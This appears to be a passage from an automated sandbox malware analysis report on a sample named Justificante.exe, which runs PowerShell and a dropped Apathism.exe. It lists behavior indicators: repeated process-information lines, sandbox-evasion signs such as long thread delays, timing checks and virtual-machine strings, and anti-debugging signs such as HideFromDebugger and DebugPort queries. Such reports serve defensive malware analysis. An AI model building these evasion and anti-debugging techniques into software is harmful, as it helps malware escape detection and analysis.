      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeAPI/Special instruction interceptor: Address: 6042F9E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237096E rdtsc 7_2_2237096E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7957Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1694Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeAPI coverage: 0.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe TID: 6688Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Justificante.exe, 00000000.00000002.1504902892.0000000000555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yp
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2563282509.000000000669D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
      Source: Apathism.exe, 00000007.00000002.2600618347.000000000669D000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2563282509.000000000669D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`'j
      Source: Justificante.exe, 00000000.00000003.1472429055.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wwwhttp://0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94__J
      Source: C:\Users\user\Desktop\Justificante.exeAPI call chain: ExitProcess graph end nodegraph_0-3648
      Source: C:\Users\user\Desktop\Justificante.exeAPI call chain: ExitProcess graph end nodegraph_0-3806
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237096E rdtsc 7_2_2237096E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_070A9B1B LdrInitializeThunk,LdrInitializeThunk,2_2_070A9B1B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232823B mov eax, dword ptr fs:[00000030h]7_2_2232823B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E0274 mov eax, dword ptr fs:[00000030h]7_2_223E0274
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334260 mov eax, dword ptr fs:[00000030h]7_2_22334260
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334260 mov eax, dword ptr fs:[00000030h]7_2_22334260
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334260 mov eax, dword ptr fs:[00000030h]7_2_22334260
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232826B mov eax, dword ptr fs:[00000030h]7_2_2232826B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A250 mov eax, dword ptr fs:[00000030h]7_2_2232A250
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336259 mov eax, dword ptr fs:[00000030h]7_2_22336259
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA250 mov eax, dword ptr fs:[00000030h]7_2_223EA250
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA250 mov eax, dword ptr fs:[00000030h]7_2_223EA250
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B8243 mov eax, dword ptr fs:[00000030h]7_2_223B8243
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B8243 mov ecx, dword ptr fs:[00000030h]7_2_223B8243
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223402A0 mov eax, dword ptr fs:[00000030h]7_2_223402A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223402A0 mov eax, dword ptr fs:[00000030h]7_2_223402A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov eax, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov ecx, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov eax, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov eax, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov eax, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C62A0 mov eax, dword ptr fs:[00000030h]7_2_223C62A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E284 mov eax, dword ptr fs:[00000030h]7_2_2236E284
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E284 mov eax, dword ptr fs:[00000030h]7_2_2236E284
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B0283 mov eax, dword ptr fs:[00000030h]7_2_223B0283
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B0283 mov eax, dword ptr fs:[00000030h]7_2_223B0283
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B0283 mov eax, dword ptr fs:[00000030h]7_2_223B0283
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223402E1 mov eax, dword ptr fs:[00000030h]7_2_223402E1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223402E1 mov eax, dword ptr fs:[00000030h]7_2_223402E1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223402E1 mov eax, dword ptr fs:[00000030h]7_2_223402E1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A2C3 mov eax, dword ptr fs:[00000030h]7_2_2233A2C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A2C3 mov eax, dword ptr fs:[00000030h]7_2_2233A2C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A2C3 mov eax, dword ptr fs:[00000030h]7_2_2233A2C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A2C3 mov eax, dword ptr fs:[00000030h]7_2_2233A2C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A2C3 mov eax, dword ptr fs:[00000030h]7_2_2233A2C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C310 mov ecx, dword ptr fs:[00000030h]7_2_2232C310
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22350310 mov ecx, dword ptr fs:[00000030h]7_2_22350310
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A30B mov eax, dword ptr fs:[00000030h]7_2_2236A30B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A30B mov eax, dword ptr fs:[00000030h]7_2_2236A30B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A30B mov eax, dword ptr fs:[00000030h]7_2_2236A30B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D437C mov eax, dword ptr fs:[00000030h]7_2_223D437C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov eax, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov eax, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov eax, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov ecx, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov eax, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B035C mov eax, dword ptr fs:[00000030h]7_2_223B035C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FA352 mov eax, dword ptr fs:[00000030h]7_2_223FA352
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D8350 mov ecx, dword ptr fs:[00000030h]7_2_223D8350
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B2349 mov eax, dword ptr fs:[00000030h]7_2_223B2349
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328397 mov eax, dword ptr fs:[00000030h]7_2_22328397
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328397 mov eax, dword ptr fs:[00000030h]7_2_22328397
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328397 mov eax, dword ptr fs:[00000030h]7_2_22328397
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E388 mov eax, dword ptr fs:[00000030h]7_2_2232E388
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E388 mov eax, dword ptr fs:[00000030h]7_2_2232E388
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E388 mov eax, dword ptr fs:[00000030h]7_2_2232E388
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235438F mov eax, dword ptr fs:[00000030h]7_2_2235438F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235438F mov eax, dword ptr fs:[00000030h]7_2_2235438F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E3F0 mov eax, dword ptr fs:[00000030h]7_2_2234E3F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E3F0 mov eax, dword ptr fs:[00000030h]7_2_2234E3F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E3F0 mov eax, dword ptr fs:[00000030h]7_2_2234E3F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223663FF mov eax, dword ptr fs:[00000030h]7_2_223663FF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223403E9 mov eax, dword ptr fs:[00000030h]7_2_223403E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE3DB mov eax, dword ptr fs:[00000030h]7_2_223DE3DB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE3DB mov eax, dword ptr fs:[00000030h]7_2_223DE3DB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE3DB mov ecx, dword ptr fs:[00000030h]7_2_223DE3DB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE3DB mov eax, dword ptr fs:[00000030h]7_2_223DE3DB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D43D4 mov eax, dword ptr fs:[00000030h]7_2_223D43D4
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D43D4 mov eax, dword ptr fs:[00000030h]7_2_223D43D4
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EC3CD mov eax, dword ptr fs:[00000030h]7_2_223EC3CD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
